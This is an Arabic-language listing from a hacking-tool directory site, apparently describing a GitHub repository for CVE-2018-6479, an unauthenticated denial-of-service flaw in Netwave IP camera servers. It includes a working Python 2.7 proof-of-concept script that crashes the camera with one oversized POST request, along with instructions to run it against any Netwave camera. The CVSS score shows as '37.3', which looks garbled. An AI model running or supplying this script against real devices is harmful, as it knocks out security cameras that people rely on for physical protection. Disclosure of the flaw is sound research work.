Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
netwave-dosvulnerability — [CVE-2018-6479] خادم كاميرا Netwave IP عرضة لهجوم رفض الخدمة عبر طلب POST ضخم واحد. | Kitploit
أدوات/GitHubGitHub/dreadlocked/netwave-dosvulnerability
أمان إنترنت الأشياءتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمان الأجهزة وإنترنت الأشياء
GitHubdreadlocked/netwave-dosvulnerability

netwave-dosvulnerability

[CVE-2018-6479] خادم كاميرا Netwave IP عرضة لهجوم رفض الخدمة عبر طلب POST ضخم واحد.

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
558منذ 8 سنواتلم تتم المراجعة بعد

خادم كاميرا Netwave IP عرضة لهجوم رفض الخدمة عن بُعد بدون مصادقة عبر طلب POST ضخم واحد على أي برنامج ثابت.

CVEالوصف
CVE-2018-6479ثغرة رفض خدمة عن بُعد بدون مصادقة
CVSSالدرجةالتفاصيل
37.3CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:X/RL:W/RC:X

0. مقدمة:

أثناء بحث أمني في إنترنت الأشياء، تم اكتشاف بعض الثغرات في موردي كاميرات IP مختلفين. كاميرا Netwave IP هي خادم كاميرا IP يسمح بمشاهدة فيديو الكاميرا وإدارتها. تُستخدم كاميرات IP بشكل خاص لأغراض الأمن المادي والتحكم، لذا فإن توفرها أمر بالغ الأهمية.

1. رفض الخدمة:

يمكن تعطيل أي كاميرا Netwave IP عن طريق إرسال طلب POST ضخم إلى مسارها الجذر. بمجرد إرسال الطلب، يتعطل الجهاز ويتوقف عن بث الصوت والفيديو.

إثبات المفهوم: قم بتشغيل سكربت Python 2.7 التالي ضد أي كاميرا NetWave IP، وسيتوقف عن الاستجابة وبث الفيديو/الصوت فورًا.

import string
import httplib
import urllib2

host = "CAMERA_IP"
port = 80
params='A'*9999999 # Huge body

headers = { 
"Host": host + ':' + str(port),
"Connection": "keep-alive",
"Content-Length": 9999999,
}

url = "/"

conn = httplib.HTTPConnection(host,port=port)
conn.request("POST",url,params,headers)
response = conn.getresponse()
data = response.read()
print data

2. الباحث:

Gonzalo García León

تنزيل الأداة